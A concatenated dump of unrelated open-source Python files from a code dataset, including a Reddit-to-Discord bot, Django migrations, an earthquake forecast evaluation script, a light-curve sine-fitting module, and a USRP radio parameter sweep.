post_message(message, image_url)
def get_rising_submissions(subreddit):
"""Connects to the Reddit API and queries the top rising submission
from the specified subreddit.
Parameters
----------
subreddit : str
The name of the subreddit without forward slashes.
Returns
-------
tuple
A tuple containing a formatted message and an image url.
"""
endpoint = random.choice(['top','rising'])
url = f"https://www.reddit.com/r/{subreddit}/{endpoint}.json?limit=1"
headers = {"User-Agent": "Reddit Rising Checker v1.0"}
with requests.get(url, headers=headers) as response:
data = response.json()["data"]["children"]
# Iterate over all the children.
for item in data:
item_data = item["data"]
# We will collect only the fields we are interested in.
title = item_data["title"]
permalink = "https://reddit.com" + item_data["permalink"]
author = item_data["author"]
score = item_data["score"]
image_url = item_data["url"]
# Compose a Markdown message using string formatting.
message = f"[{title}]({permalink})\nby **{author}**\n**{score:,}** points"
return (message, image_url)
def post_message(message, image_url):
"""Sends the formatted message to a Discord server.
Parameters
----------
message : str
The formatted message to post.
image_url : str
The URL used as the thumbnail.
"""
payload = {
"username": "Mapache.Bot",
"embeds": [
{
"title": "Tendencia de Arte en Reddit",
"color": 102204,
"description": message,
"thumbnail": {"url": image_url},
"footer": {"text": "Powered by Trashpandas™"}
}
]
}
with requests.post(WEBHOOK_URL, json=payload) as response:
print(response.status_code)
if __name__ == "__main__":
main()
| 3.703125 | 4 |
libtool/util/regex.py | matan-h/libtool | 0 | 12770789 | <reponame>matan-h/libtool<filename>libtool/util/regex.py
import re
def get_val(val, string):
sec = """{}(\s|)+=(\s|)+(["'])(.*)(["'])""".format(val)
return re.findall(sec, string)[0][3]
| 2.875 | 3 |
mysite/asd.py | iml1111/django-study | 0 | 12770790 | <reponame>iml1111/django-study
from django_jwt_extended.decorators import jwt_required
@jwt_required()
def asdasdasd():
return "sad"
asdasdasd() | 1.976563 | 2 |
core/filters.py | ankit94/ShoppingWebsiteDjango | 0 | 12770791 | <gh_stars>0
import django_filters
from django_filters import CharFilter
from .models import Item
class ItemFilter(django_filters.FilterSet):
title = CharFilter(field_name='title', lookup_expr='icontains')
class Meta:
model = Item
fields = ['title']
| 1.789063 | 2 |
scripts/plot_Figure5.py | pabloitu/pycsep_esrl-1 | 0 | 12770792 | <reponame>pabloitu/pycsep_esrl-1
# Python imports
import os
import json
import time
# 3rd party impoorts
import numpy as np
import matplotlib.pyplot as plt
import cartopy.crs as ccrs
# pycsep imports
from csep import load_catalog_forecast, load_catalog, load_json, load_evaluation_result
from csep.models import Event, Polygon
from csep.core.regions import (
generate_aftershock_region,
california_relm_region,
masked_region,
magnitude_bins,
create_space_magnitude_region
)
from csep.core.catalogs import CSEPCatalog
from csep.core.forecasts import GriddedDataSet
from csep.core.catalog_evaluations import spatial_test, number_test
from csep.utils.constants import SECONDS_PER_WEEK
from csep.utils.plots import plot_spatial_dataset, plot_number_test, plot_spatial_test
from csep.utils.scaling_relationships import WellsAndCoppersmith
from csep.utils.time_utils import epoch_time_to_utc_datetime, datetime_to_utc_epoch
# local imports
from experiment_utilities import california_experiment, italy_experiment
def sort_by_longitude(coords):
return coords[coords[:,0].argsort()]
# file-path for results
sim_name = '2019_09_04-ComCatM7p1_ci38457511_ShakeMapSurfaces'
simulation_dir = f'/Users/wsavran/Research/ridgecrest_evaluation_bssa/{sim_name}'
results_dir = f'/Users/wsavran/Research/ridgecrest_evaluation_bssa/updated_analysis/ucerf3-ridgecrest/{sim_name}'
ucerf3_raw_data = os.path.join(simulation_dir, 'results_complete.bin')
m71_event = os.path.join(simulation_dir, 'm71_event.json')
ucerf3_config = os.path.join(results_dir, 'config.json')
catalog_fname = os.path.join(results_dir, 'evaluation_catalog.json')
n_test_result_fname = os.path.join(results_dir, 'results/n-test_mw_2p5.json')
# magnitude range
min_mw = 2.5
max_mw = 8.95
dmw = 0.1
# define start and end epoch of the forecast
with open(ucerf3_config, 'r') as config_file:
config = json.load(config_file)
start_epoch = config['startTimeMillis']
end_epoch = start_epoch + SECONDS_PER_WEEK * 1000
# number of fault radii to use for spatial filtering
num_radii = 3
# load evaluation catalog
catalog = load_json(CSEPCatalog(), catalog_fname)
# load event
event = load_json(Event(), m71_event)
event_epoch = datetime_to_utc_epoch(event.time)
# define aftershock region and magnitude region
rupture_length = WellsAndCoppersmith.mag_length_strike_slip(event.magnitude) * 1000
aftershock_polygon = Polygon.from_great_circle_radius((event.longitude, event.latitude), num_radii*rupture_length, num_points=100)
# region from scratch using pycsep
aftershock_region = masked_region(california_relm_region(dh_scale=4, use_midpoint=False), aftershock_polygon)
mw_bins = magnitude_bins(min_mw, max_mw, dmw)
smr = create_space_magnitude_region(catalog.region, mw_bins)
# some checks to show that we obtain the same region
assert smr == catalog.region
# create forecast object
filters = [
f'origin_time >= {start_epoch}',
f'origin_time < {end_epoch}',
f'magnitude >= {min_mw}'
]
print('Before filtering observation catalog')
print(catalog)
print('After filtering observation catalog')
catalog = catalog.filter(filters).filter_spatial(region=smr)
catalog = catalog.apply_mct(event.magnitude, event_epoch)
print(catalog)
u3etas_forecast = load_catalog_forecast(
ucerf3_raw_data,
start_time = epoch_time_to_utc_datetime(start_epoch),
end_time = epoch_time_to_utc_datetime(end_epoch),
region=smr,
type='ucerf3',
event=event,
filters=filters,
filter_spatial=True,
apply_mct=True,
apply_filters=True,
)
# evaluate forecasting model
print('computing number test results')
n_test = number_test(u3etas_forecast, catalog)
print('computing spatial test results')
s_test = spatial_test(u3etas_forecast, catalog, verbose=False)
# plot the results
plot_number_test(n_test, show=False, plot_args={'title': ''})
plot_spatial_test(s_test, show=False, plot_args={'title':''}))
ax.get_figure().savefig('../figures/Figure5b.png', dpi=300)
ax.get_figure().savefig('../figures/Figure5c.png', dpi=300)
# compares the test distribution computed here and from the old manuscript
# plot forecast
plot_args = {
'projection': ccrs.PlateCarree(),
'legend': True,
'legend_loc': 1,
'grid_fontsize': 12,
'frameon': True,
'mag_ticks': [2.5, 3.0, 3.5, 4.0],
'markercolor': 'gray',
'legend_titlesize': 16,
'legend_fontsize': 12,
'mag_scale': 5,
'catalog': catalog,
'edgecolor': 'black'
}
ax = u3etas_forecast.plot(show=True, plot_args=plot_args)
ax.get_figure().savefig('../figures/Figure5a.png', dpi=300)
| 1.789063 | 2 |
resource_tracker/migrations/0005_auto_20211015_1015.py | LaudateCorpus1/squest | 112 | 12770793 | # Generated by Django 3.2.7 on 2021-10-15 08:15
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('resource_tracker', '0004_alter_resourcepoolattributedefinition_resource_pool'),
]
operations = [
migrations.RenameField(
model_name='resourcegroupattributedefinition',
old_name='resource_group_definition',
new_name='resource_group',
),
migrations.RenameField(
model_name='resourcegrouptextattributedefinition',
old_name='resource_group_definition',
new_name='resource_group',
),
migrations.AlterUniqueTogether(
name='resourcegroupattributedefinition',
unique_together={('name', 'resource_group')},
),
migrations.AlterUniqueTogether(
name='resourcegrouptextattributedefinition',
unique_together={('name', 'resource_group')},
),
]
| 1.679688 | 2 |
api/core/migrations/0001_initial.py | JRMurr/rps | 1 | 12770794 | <filename>api/core/migrations/0001_initial.py<gh_stars>1-10
# Generated by Django 2.2.5 on 2019-09-19 23:17
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0011_update_proxy_permissions'),
]
operations = [
migrations.CreateModel(
name='Game',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('game_num', models.PositiveSmallIntegerField()),
],
options={
'ordering': ('match_id', 'game_num'),
'abstract': False,
},
),
migrations.CreateModel(
name='Match',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('start_time', models.DateTimeField()),
('duration', models.PositiveIntegerField()),
],
options={
'ordering': ('-start_time',),
},
),
migrations.CreateModel(
name='MatchConfig',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('best_of', models.PositiveSmallIntegerField()),
('extended_mode', models.BooleanField()),
('public', models.BooleanField()),
],
),
migrations.CreateModel(
name='Player',
fields=[
],
options={
'proxy': True,
'indexes': [],
'constraints': [],
},
bases=('auth.user',),
),
migrations.CreateModel(
name='PlayerMatch',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('player_num', models.IntegerField()),
('match', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.Match')),
('player', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='core.Player')),
],
options={
'ordering': ('player_num',),
'abstract': False,
'unique_together': {('player_num', 'match'), ('player', 'match')},
},
),
migrations.CreateModel(
name='PlayerGame',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('player_num', models.IntegerField()),
('move', models.CharField(choices=[('rock', 'rock'), ('paper', 'paper'), ('scissors', 'scissors'), ('lizard', 'lizard'), ('spock', 'spock')], max_length=20)),
('game', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.Game')),
('player', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='core.Player')),
],
options={
'ordering': ('player_num',),
'abstract': False,
'unique_together': {('player_num', 'game'), ('player', 'game')},
},
),
migrations.AddField(
model_name='match',
name='config',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='core.MatchConfig'),
),
migrations.AddField(
model_name='match',
name='players',
field=models.ManyToManyField(related_name='matches', through='core.PlayerMatch', to='core.Player'),
),
migrations.AddField(
model_name='match',
name='rematch',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='parent', to='core.Match'),
),
migrations.AddField(
model_name='match',
name='winner',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='match_wins', to='core.Player'),
),
migrations.AddField(
model_name='game',
name='match',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='games', to='core.Match'),
),
migrations.AddField(
model_name='game',
name='players',
field=models.ManyToManyField(through='core.PlayerGame', to='core.Player'),
),
migrations.AddField(
model_name='game',
name='winner',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='game_wins', to='core.Player'),
),
migrations.AlterUniqueTogether(
name='game',
unique_together={('game_num', 'match')},
),
]
| 1.710938 | 2 |
varana/varana/fit.py | pbrus/variability-analyser | 2 | 12770795 | <reponame>pbrus/variability-analyser<filename>varana/varana/fit.py<gh_stars>1-10
"""
Fit a sum of sines to the light curve.
"""
from math import sqrt, pow, atan2
from typing import Callable, Tuple, List
import numpy as np
from numpy import ndarray
from scipy.optimize import curve_fit
from varana.freq_comb import linear_combination
def approximate_sines_sum(frequencies: List[float]) -> Callable:
"""
For given frequencies calculate a parameterized sum of sines. Each sine function is linearized, i.e.:
A*sin(2*pi*x + fi) + y0 is equal: A1*sin(2*pi*x) + A2*cos(2*pi*x) + y0
where A = sqrt(A1^2 + A2^2), arctg(fi)=A2/A1
Parameters
----------
frequencies : List[float]
A list with frequencies.
Returns
-------
sines_sum : function
Parameterized sum of sines.
"""
def _sines_sum(x, *sines_parameters):
"""
Compose a sum of sines.
"""
param = sines_parameters
func = 0
for i, frequency in enumerate(frequencies):
i *= 3
func += (
param[i] * np.sin(2 * np.pi * frequency * x)
+ param[i + 1] * np.cos(2 * np.pi * frequency * x)
+ param[i + 2]
)
return func
return _sines_sum
def amplitude(coefficients: ndarray) -> float:
"""
Calculate an amplitude from coefficients. See approximate_sines_sum function.
Parameters
----------
coefficients : ndarray
A (2,)-shape array with two coefficients.
Returns
-------
float
A value of the amplitude.
"""
return sqrt(sum(map(lambda x: pow(x, 2), coefficients)))
def phase(coefficients: ndarray) -> float:
"""
Calculate a phase from coefficients. See approximate_sines_sum function.
Parameters
----------
coefficients : ndarray
A (2,)-shape array with two coefficients.
Returns
-------
float
A phase angle from (0, 2pi) interval.
"""
ph = atan2(*coefficients[::-1])
return ph if ph >= 0 else ph + 2 * np.pi
def convert_linear_parameters(parameters: ndarray) -> ndarray:
"""
Convert all A1, A2 parameters of sum of sines function to amplitudes and phases.
For more info see approximate_sines_sum function.
Parameters
----------
parameters : ndarray
An array with all parameters of sum of sines function.
Returns
-------
parameters : ndarray
An array with replaced coefficients by amplitudes and phases.
"""
for param in parameters.reshape(-1, 3):
amp = amplitude(param[:2])
ph = phase(param[:2])
param[0] = amp
param[1] = ph
return parameters
def add_frequencies(parameters: ndarray, frequencies: List[float]) -> ndarray:
"""
Add frequencies to the array with parameters of sum of sines function.
Parameters
----------
parameters : ndarray
An array with all parameters of sum of sines function without frequencies.
frequencies : List[float]
A list with all frequencies delivered by input.
Returns
-------
updated_parameters : ndarray
A new (-1,4)-shape array supplemented by the frequencies.
"""
updated_parameters = np.empty(0).reshape(0, 4)
for parameter, frequency in zip(parameters.reshape(-1, 3), frequencies):
parameter = np.insert(parameter, 1, frequency)
updated_parameters = np.append(updated_parameters, parameter)
return updated_parameters.reshape(-1, 4)
def fit_approximate_curve(lightcurve: ndarray, frequencies: List[float]) -> ndarray:
"""
Fit an approximate curve to the light curve using a linear least squares method. The curve is composed of a sum of
sines. Each sine has defined frequency.
Parameters
----------
lightcurve : ndarray
An array composed of three columns: time, magnitude, errors.
frequencies : List[float]
A list with all frequencies delivered by input.
Returns
-------
parameters : ndarray
An array with parameters which describe approximate_sines_sum function.
"""
func = approximate_sines_sum(frequencies)
time, mag, err = lightcurve[:, 0], lightcurve[:, 1], lightcurve[:, 2]
x0 = np.zeros(3 * len(frequencies))
parameters, _ = curve_fit(func, time, mag, sigma=err, p0=x0)
return parameters
def approximate_parameters(lightcurve: ndarray, frequencies: List[float]) -> ndarray:
"""
Calculate parameters of an approximate sum of sines.
Parameters
----------
lightcurve : ndarray
An array composed of three columns: time, magnitude, errors.
frequencies : List[float]
A list with all frequencies delivered by input.
Returns
-------
parameters : ndarray
An array with parameters which describe each sine, i.e.: amplitude, frequency, phase, y intercept.
"""
parameters = fit_approximate_curve(lightcurve, frequencies)
parameters = convert_linear_parameters(parameters)
parameters = add_frequencies(parameters, frequencies)
return parameters
def final_sines_sum(linear_comb: ndarray) -> Callable:
"""
For a given linear combination of basic frequencies return parameterized sum of sines.
Parameters
----------
linear_comb : ndarray
An (n,m)-shape array with integers:
- n: a number of all frequencies (base and their combinations)
- m: a number of basic frequencies
Returns
-------
sines_sum : function
The parameterized sum of sines.
"""
def _sines_sum(x, *param):
"""
Compose a sum of sines.
"""
m, n = linear_comb.shape
func = 0
for i in range(m):
frequency = np.dot(param[:n], linear_comb[i])
i *= 2
func += param[n + i] * np.sin(2 * np.pi * frequency * x + param[n + i + 1])
return func + param[-1]
return _sines_sum
def split_frequencies(
frequencies: List[float], minimum: int, maximum: int, max_harmonic: int, epsilon: float
) -> Tuple[List[float], List[float]]:
"""
Split frequencies into two lists using linear combination of coefficients C1, C2, C3, ...: (C1*f1 + C2*f2 + ...)
Parameters
----------
frequencies : List[float]
A list with frequencies.
minimum : int
A lower bound of each coefficient.
maximum : int
An upper bound of each coefficient.
max_harmonic : int
A maximum value for a harmonic. It should be greater than the upper bound of each coefficient.
epsilon : float
If a single frequency is compared to the linear combination of another frequencies, the epsilon means tolerance
in this comparison.
Returns
-------
tuple
A tuple made of two list. The first one contains basic frequencies, the second one their combinations.
"""
frequencies = sorted(frequencies)
basic_frequencies = frequencies[:1]
for i in range(len(frequencies) - 1):
if not np.any(
linear_combination(basic_frequencies, frequencies[i + 1], minimum, maximum, max_harmonic, epsilon)
):
basic_frequencies.append(frequencies[i + 1])
return basic_frequencies, [freq for freq in frequencies if freq not in basic_frequencies]
def frequencies_combination(
frequencies: List[float], minimum: int, maximum: int, max_harmonic: int, epsilon: float
) -> Tuple[List[float], ndarray]:
"""
Select from all frequencies only those which are independent and generate an array with coefficients of linear
combinations of basic frequencies, i.e. C1, C2, C3, ...: (C1*f1 + C2*f2 + ...)
Parameters
----------
frequencies : List[float]
A list with frequencies.
minimum : int
A lower bound of each coefficient.
maximum : int
An upper bound of each coefficient.
max_harmonic : int
A maximum value for a harmonic. It should be greater than the upper bound of each coefficient.
epsilon : float
If a single frequency is compared to the linear combination of another frequencies, the epsilon means tolerance
in this comparison.
Returns
-------
tuple
A tuple made of a list and an ndarray. The first one contains basic frequencies, the second one is an array with
coefficients of linear combinations of basic frequencies.
"""
base_frequencies, combined_frequencies = split_frequencies(frequencies, minimum, maximum, max_harmonic, epsilon)
array = np.eye(len(base_frequencies), dtype=int)
for combined_frequency in combined_frequencies:
linear_comb = linear_combination(base_frequencies, combined_frequency, minimum, maximum, max_harmonic, epsilon)
linear_comb = linear_comb.reshape(-1, len(base_frequencies))
array = np.append(array, linear_comb, axis=0)
return base_frequencies, array
def initial_sines_sum_parameters(approximate_param: ndarray, basic_frequencies: List[float]) -> ndarray:
"""
Prepare initial parameters for the sum of sines function.
Parameters
----------
approximate_param : ndarray
A list with parameters for each sine, i.e. amplitude, frequency, phase, y0.
basic_frequencies : List[float]
A list with basic frequencies.
Returns
-------
parameters : ndarray
Initial parameters for further fitting.
"""
parameters = np.array(basic_frequencies)
amplitudes_phases = np.append(approximate_param[:, :1], approximate_param[:, 2:3], axis=1).flatten()
parameters = np.append(parameters, amplitudes_phases)
parameters = np.append(parameters, approximate_param[:, -1].sum())
return parameters
def fit_final_curve(
lightcurve: ndarray,
frequencies: List[float],
minimum: int = -5,
maximum: int = 5,
max_harmonic: int = 10,
epsilon: float = 1e-5,
) -> ndarray:
"""
Fit a final curve to the light curve using a non-linear least squares method. The curve is composed of a sum
of sines. The frequency parameters are limited only to basic frequencies. Some sines can be harmonics or have
frequencies equal to linear combinations of the basic frequencies, i.e. fn = C1*f1 + C2*f2 + ...
Parameters
----------
lightcurve : ndarray
An array composed of three columns: time, magnitude, errors.
frequencies : List[float]
A list with all frequencies delivered by input.
minimum : int
A lower bound of each coefficient.
maximum : int
An upper bound of each coefficient.
max_harmonic : int
A maximum value for a harmonic. It should be greater than the upper bound of each coefficient.
epsilon : float
If a single frequency is compared to the linear combination of another frequencies, the epsilon means tolerance
in this comparison.
Returns
-------
parameters : ndarray
An array with parameters which describe a fitted function.
"""
base_frequencies, combined_frequencies = frequencies_combination(
frequencies, minimum, maximum, max_harmonic, epsilon
)
approx_param = approximate_parameters(lightcurve, np.dot(base_frequencies, combined_frequencies.T).tolist())
func = final_sines_sum(combined_frequencies)
time, mag, err = lightcurve[:, 0], lightcurve[:, 1], lightcurve[:, 2]
x0 = initial_sines_sum_parameters(approx_param, base_frequencies)
parameters, _ = curve_fit(func, time, mag, sigma=err, p0=x0)
parameters = final_parameters(parameters, combined_frequencies)
return parameters
def final_parameters(parameters: ndarray, frequencies_comb: ndarray) -> ndarray:
"""
Reformat parameters from a non-linear least squares fitting which describe a fitted curve. The curve is composed
of sum of sines function.
Parameters
----------
parameters : ndarray
An array with parameters. This array contains only basic frequencies and the rest of the parameters.
frequencies_comb : ndarray
An (n,m)-shape array with integers:
- n: a number of all frequencies (base and their combinations)
- m: a number of basic frequencies.
Returns
-------
param : ndarray
Reformatted parameters. For each fitted sine function this array contains a set of parameters:
amplitude, frequency, phase and one y0 value for the fitted curve.
"""
base_size = frequencies_comb.shape[1]
param = np.array(parameters[-1])
freqs = np.dot(parameters[:base_size], frequencies_comb.T)
n_parameters = int((len(parameters) - base_size - 1) / 2)
for i in range(n_parameters):
param = np.append(param, parameters[2 * i + base_size])
param = np.append(param, freqs[i])
param = np.append(param, normalize_phase(parameters[2 * i + 1 + base_size]))
return param
def normalize_phase(phase_param: float) -> float:
"""
Shift a phase angle to the (0, 2pi) interval.
Parameters
----------
phase_param : float
A value of phase in radians.
Returns
-------
float
A value of phase limited to (0, 2pi) interval.
"""
return phase_param - 2 * np.pi * (phase_param // (2 * np.pi))
def print_parameters(parameters: ndarray) -> None:
"""
Print parameters of sines in a nice format:
y_intercept
amplitude1 frequency1 phase1
amplitude2 frequency2 phase2
amplitude3 frequency3 phase3
...
Parameters
----------
parameters : ndarray
y0, amplitude1, frequency1, phase1, amplitude2, frequency2, phase2, ...
"""
fmt = "{0:16.10f}"
print(fmt.format(parameters[0]))
fmt += " {1:16.10f} {2:16.10f}"
for par in parameters[1:].reshape(-1, 3):
print(fmt.format(*par))
def sines_sum(parameters: ndarray) -> Callable:
"""
Construct a sum of sines for given parameters.
Parameters
----------
parameters : ndarray
y0, amplitude1, frequency1, phase1, amplitude2, frequency2, phase2, ...
Returns
-------
function
f(x) = amplitude1*sin(2*pi*frequency1*x + phase1) +
amplitude2*sin(2*pi*frequency2*x + phase2) + ... + y0
"""
par = parameters
def _sines_sum(x):
y = 0
for i in range(len(parameters) // 3):
i *= 3
y += par[i + 1] * np.sin(2 * np.pi * par[i + 2] * x + par[i + 3])
return y + par[0]
return _sines_sum
def substract_model(data: ndarray, model: Callable) -> ndarray:
"""
Substract a model from the second column of the data.
Parameters
----------
data : ndarray
The data composed of two columns at least.
model : function
A function which describes the model.
Returns
-------
data : ndarray
Updated data: column2 = column2 - model(column1)
"""
data[:, 1] -= model(data[:, 0])
return data
def save_residuals(lightcurve: ndarray, parameters: ndarray, filename: str) -> None:
"""
Save residuals of a light curve to the file.
Parameters
----------
lightcurve : ndarray
An ndarray with (n, 3)-shape storing: time, magnitude, mag's error.
parameters : ndarray
An ndarray which stores parameters for each sine.
filename : str
A name of the file where the data will be saved to.
"""
model = sines_sum(parameters)
lightcurve = substract_model(lightcurve, model)
np.savetxt(filename, lightcurve, fmt="%18.7f %15.7f %15.7f")
| 2.90625 | 3 |
caption_vae/version.py | jiahuei/test-caption-actions | 3 | 12770796 | <reponame>jiahuei/test-caption-actions
# -*- coding: utf-8 -*-
"""
Created on 31 Dec 2020 12:18:55
@author: jiahuei
"""
__version__ = "0.4.0"
| 0.523438 | 1 |
examples/async.py | cmheisel/presentation-python-threading | 0 | 12770797 | <gh_stars>0
"""
Thanks to http://skipperkongen.dk/2016/09/09/easy-parallel-http-requests-with-python-and-asyncio/ for the pattern.
"""
import asyncio
from timeit import default_timer as timer
import requests
URLS = [
"http://slowyourload.net/5/https://chrisheisel.com",
"http://slowyourload.net/4/https://chrisheisel.com",
"http://slowyourload.net/3/https://chrisheisel.com",
"http://slowyourload.net/2/https://chrisheisel.com",
"http://slowyourload.net/1/https://chrisheisel.com",
]
def get_url(url):
print("GET {}".format(url))
requests.get(url)
print("\tDONE GET {}".format(url))
async def main(loop):
print("Async ====================")
start = timer()
futures = []
for url in URLS:
future = loop.run_in_executor(None, get_url, url)
futures.append(future)
for response in await asyncio.gather(*futures):
pass
end = timer()
duration = (end - start)
print("DONE in {} seconds".format(duration))
if __name__ == "__main__":
event_loop = asyncio.get_event_loop()
try:
event_loop.run_until_complete(main(event_loop))
finally:
event_loop.close()
| 3.265625 | 3 |
python/cudf/io/json.py | tgravescs/cudf | 1 | 12770798 | <filename>python/cudf/io/json.py
# Copyright (c) 2019, NVIDIA CORPORATION.
import cudf
from cudf.utils import ioutils
import pandas as pd
import warnings
@ioutils.doc_read_json()
def read_json(path_or_buf, *args, **kwargs):
"""{docstring}"""
warnings.warn("Using CPU via Pandas to read JSON dataset, this may "
"be GPU accelerated in the future")
pd_value = pd.read_json(path_or_buf, *args, **kwargs)
return cudf.from_pandas(pd_value)
@ioutils.doc_to_json()
def to_json(cudf_val, path_or_buf=None, *args, **kwargs):
"""{docstring}"""
warnings.warn("Using CPU via Pandas to write JSON dataset, this may "
"be GPU accelerated in the future")
pd_value = cudf_val.to_pandas()
pd.io.json.to_json(
path_or_buf,
pd_value,
*args,
**kwargs
)
| 2.5625 | 3 |
setup.py | CUrW-SL/distributed_hechms | 1 | 12770799 | from setuptools import setup,find_packages
setup(
name='hechmsd',
version='1.0.0',
packages=find_packages(),
url='http://www.curwsl.org/',
license='',
author='hasitha',
author_email='<EMAIL>',
description='HecHms Distributed version',
include_package_data=True,
install_requires=['FLASK', 'Flask-Uploads', 'Flask-JSON', 'pandas','numpy','shapely', 'joblib', 'netCDF4', 'matplotlib', 'imageio', 'scipy', 'geopandas'],
zip_safe=False
)
| 1.023438 | 1 |
app/auth/models.py | farooq-teqniqly/envino | 0 | 12770800 | from datetime import datetime
from flask_login import UserMixin
from flask_sqlalchemy import SQLAlchemy
db = SQLAlchemy()
class User(UserMixin, db.Model):
id = db.Column(db.String(32), primary_key=True)
username = db.Column(db.String(128), index=True, unique=True, nullable=False)
email = db.Column(db.String(128), index=True, unique=True, nullable=False)
is_authorized = db.Column(db.Integer, default=0, nullable=False)
created = db.Column(db.DateTime, default=datetime.utcnow, nullable=False)
class OAuth(db.Model):
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.String(32), db.ForeignKey(User.id), nullable=False)
token = db.Column(db.String(1024), nullable=False)
access_token = db.Column(db.String(256), nullable=False)
expires_in = db.Column(db.DateTime, nullable=False)
provider = db.Column(db.String(10), default="google", nullable=False)
expired = db.Column(db.Integer, default=0, nullable=False)
created = db.Column(db.DateTime, default=datetime.utcnow, nullable=False)
user = db.relationship(User)
| 2.6875 | 3 |
scripts/swipe_parameter.py | zjc263/GPU_SDR | 9 | 12770801 | import sys,os,random
import numpy as np
try:
import pyUSRP as u
except ImportError:
try:
sys.path.append('..')
import pyUSRP as u
except ImportError:
print "Cannot find the pyUSRP package"
import argparse
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Test the basic VNA functionality.')
parser.add_argument('--folder', '-fn', help='Name of the folder in which the data will be stored. Move to this folder before everything', type=str, default = "data")
parser.add_argument('--gain', '-g', help='list of TX gains, default is 0', nargs='+')
parser.add_argument('--frontend', '-rf', help='front-end character: A or B', type=str, default="A")
parser.add_argument('--guard_tones','-gt', nargs='+', help='Add guard Tones in MHz (offset from freq) as a list i.e. -T 1 2 3')
parser.add_argument('--decimation', '-d', help='Decimation factor required', type=float, default=100)
parser.add_argument('--time', '-t', help='Duration of the noise acquisition in seconds', type=float, default=10)
parser.add_argument('--VNA', '-vna', help='Initial VNA, resonators will be initialized with the parameter of this file (has to be fitted)', type=str, required = True)
parser.add_argument('--seed_init', '-si', help='Initialize every fit with the seed VNA instead of using last VNA', action="store_true")
parser.add_argument('--peak_width', '-w', help='Frequency span for fitting.', type=float, default=80e3)
parser.add_argument('--mode', '-m', help='Noise acquisition kernels. DIRECT uses direct demodulation PFB use the polyphase filter bank technique.', type=str, default= "DIRECT")
parser.add_argument('--trigger', '-tr', help='String describing the trigger to use. Default is no trigger. Use the name of the trigger classes defined in the trigger module with no parentesis', type=str)
args = parser.parse_args()
try:
os.mkdir(args.folder)
except OSError:
pass
os.chdir(args.folder)
if args.gain is None:
gains = [0,]
else:
gains = [int(float(a)) for a in args.gain]
if args.guard_tones is None:
guard_tones = []
else:
guard_tones = np.asarray([int(float(a)*1e6) for a in args.guard_tones])
if args.frontend == 'A':
ant = "A_RX2"
elif args.frontend == 'B':
ant = "B_RX2"
else:
err_msg = "Frontend %s unknown" % args.frontend
u.print_warning(err_msg)
ant = None
if trigger is not None:
try:
trigger = eval('u.'+trigger+'()')
except SyntaxError:
u.print_error("Cannot find the trigger \'%s\'. Is it implemented in the USRP_triggers module?"%trigger)
return ""
except AttributeError:
u.print_error("Cannot find the trigger \'%s\'. Is it implemented in the USRP_triggers module?"%trigger)
return ""
#replicate the VNA measure (WARNING: DOES NOT SUPPORT ITERATIONS)
u.print_debug("Replicating seed VNA measure to ensure phase coherency...")
VNA_seed_info = u.get_rx_info(args.VNA, ant=ant)
seed_rf, seed_tones = u.get_tones(args.VNA)
seed_start_f = VNA_seed_info['freq'][0]
seed_end_f = VNA_seed_info['chirp_f'][0]
seed_measure_t = VNA_seed_info['chirp_t'][0]
seed_points = VNA_seed_info['swipe_s'][0]
seed_gain = VNA_seed_info['gain']
seed_rate = VNA_seed_info['rate']
seed_ntones = len(seed_tones) + len(guard_tones)
u.print_debug("Adjusting power for %d tone readout..."%seed_ntones)
if not u.Connect():
u.print_error("Cannot find the GPU server!")
exit()
#measure line delay
filename = u.measure_line_delay(seed_rate, seed_rf, str(args.frontend), USRP_num=0, tx_gain=0, rx_gain=0, output_filename=None, compensate = True, duration = 0.1)
delay = u.analyze_line_delay(filename, True)
u.write_delay_to_file(filename, delay)
u.load_delay_from_file(filename)
vna_seed_filename = u.Single_VNA(
start_f = seed_start_f,
last_f = seed_end_f,
measure_t = seed_measure_t,
n_points = seed_points,
tx_gain = seed_gain,
Rate=seed_rate,
decimation=True,
RF=seed_rf,
Front_end=str(args.frontend),
Device=None,
output_filename=None,
Multitone_compensation=seed_ntones,
Iterations=1,
verbose=False
)
u.VNA_analysis(vna_seed_filename)
u.initialize_from_VNA(args.VNA, vna_seed_filename)
u.vna_fit(vna_seed_filename, p0=None, fit_range = args.peak_width, verbose = False)
u.plot_VNA(vna_seed_filename, backend = "plotly", plot_decim = None)
u.plot_resonators(vna_seed_filename, reso_freq = None, backend = 'plotly')
#start swiping the gain parameter.
# Add here other for loops on different params and possibly create/change folders
#ack = raw_input("Press any key to continue (plotting of the first VNA should be in the browser)")
for i in range(len(gains)):
vna_filename = u.Single_VNA(
start_f = seed_start_f,
last_f = seed_end_f,
measure_t = seed_measure_t,
n_points = seed_points,
tx_gain = gains[i],
Rate=seed_rate,
decimation=True,
RF=seed_rf,
Front_end=args.frontend,
Device=None,
output_filename=None,
Multitone_compensation=seed_ntones,
Iterations=1,
verbose=False
)
u.VNA_analysis(vna_filename)
#initialize resonators from last VNA scan or from seed
if args.seed_init or (i == 0):
u.initialize_from_VNA(vna_seed_filename, vna_filename)
else:
u.initialize_from_VNA(last_vna_filename, vna_filename)
# WARNING: If folder is changed this line has to change accordingly!
last_vna_filename = vna_filename
#fit resonators
u.vna_fit(vna_filename, p0=None, fit_range = args.peak_width, verbose = False)
#u.plot_VNA(vna_filename, backend = "plotly", plot_decim = None)
